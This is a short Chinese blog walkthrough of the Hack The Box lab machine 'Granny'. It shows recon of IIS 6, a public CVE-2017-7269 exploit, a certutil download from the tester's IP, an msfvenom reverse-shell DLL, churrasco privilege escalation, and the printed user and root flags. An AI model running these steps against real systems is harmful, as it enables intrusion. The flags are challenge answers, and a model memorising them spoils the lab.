[Day25] HTB Granny
- URL : https://app.hackthebox.eu/machines/14
- IP : 10.129.2.63
Recon
- 观察首页
-
- IIS 6
-
- nmap 扫 port
-
nmap -A -p80 10.129.2.63 -
-
- 扫目录
-
- 发现一些奇怪的 dll
-
- http://10.129.2.63/_vti_inf.html
-
FPAuthorScriptUrl="_vti_bin/_vti_aut/author.dll" -
FPAdminScriptUrl="_vti_bin/_vti_adm/admin.dll" -
TPScriptUrl="_vti_bin/owssvr.dll"
-
Exploit
-
https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269
-
- nc 收 shell
-
- 确认使用者
-
- systeminfo
-
- 送
windows-exploit-suggester.py -
- 测 CVE-2015-1701
- https://github.com/hfiref0x/CVE-2015-1701
-
certutil -urlcache -f http://10.10.16.35/Taihou32.exe Taihou32.exe -
-
-
impacket-smbserver meow . -
copy \\10.10.16.35\meow\Taihou32.exe Taihou32.exe - shell 卡住不能用 QQQ
提权
- 准备 shell
-
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.35 LPORT=7878 -f dll > s.dll -
rundll32 s.dll
-
-
churrasco-
- churrasco.exe -d "shellx86.exe"
-
- nc 收 shell
-
- User flag
-
-
700c5dc163014e22b3e408f8703f67d1
-
- Root Flag
-
-
aa4beed1c0584445ab463a6747bd06e9
-
<<: Day 25 : 案例分享(7.4) 库存与制造 - 工单与工作中心
Day 26 - Filter 使用方式
其实威尔猪本来没打算写 Filter,因为总觉得在一般情形下不太常会用到,但又觉得这好像也算是 T...
HTML笔记(00)-为什麽我会想学网页开发?
我是今年刚毕业的新鲜人,选择了离家229公里远的工作, 连我自己都感到很意外,毕竟我是一个非常以家人...
Day 03 Blazor Server和Blazor WebAssembly的差异
下载Visual Studio後首先建立一个BlazorPratice方案,里面建立Blazor S...
JS30 Day 27 - Click and Drag学习笔记
这次的功能主要是做画面的一个点击拖曳,当点击後往左拖曳画面会往右跑,反之。 主要之架构。 <...
D31 - 三十天三十档零股总结算
过了一个月,买了三十档零股。这边公布结果。 这三十档股票 以下次资料为 10/1 收盘後的资料 总成...